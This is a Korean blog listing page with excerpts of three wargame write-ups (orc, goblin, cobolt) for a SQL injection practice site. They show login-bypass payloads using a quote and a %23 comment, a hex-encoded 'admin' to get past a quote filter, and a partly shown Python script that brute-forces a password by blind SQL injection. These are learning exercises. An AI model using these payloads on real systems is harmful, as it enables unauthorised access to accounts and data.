전체 글 (48) 썸네일형 리스트형 [LOS]orc WriteUp pw가 동일해야 풀리는 문제로, blind sql injection인 것을 알 수 있다. 먼저 pw=' or length(pw) = 8%23 을 입력하여 pw의 길이가 8인것을 알아낸다. import requestspassword = ''for admin_len in range(8): for admin_pass in range(ord('0'), ord('z')): URL = 'https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php' query = {'pw' : '\' or substr(pw, 1, ' + str(admin_len + 1) +')=\'' + password + chr(admin_pass) + .. [LOS]goblin WriteUp 먼저 코드를 살펴보면, id=guest로 고정이 되어 있고, 싱글쿼터를 필터링하는 것이 보인다. 또한 문제를 풀려면 id=admin으로 로그인 해야되는것으로 보인다. 먼저 id에 아무 숫자나 넣어본다.guest의 no는 1번으로 보인다. no에 1이 아닌 다른숫자를 넣고 id는 싱글쿼터를 우회해야 하니까 16진수로 admin을 넣어 익스하겠다. 익스 성공 [LOS]cobolt WriteUp 들어가면 이런 화면이 뜬다.비밀번호를 md5로 암호화 하여 전달하는걸로 보인다. 나는 pw를 무시하고 id구문에서 sql injection을 진행 할 것이다. id에 admin을 전달하고, '로 닫아준 후 %23으로 뒷 구문을 주석처리 해 준다. 익스 성공 이전 1 ··· 5 6 7 8 9 10 11 ··· 16 다음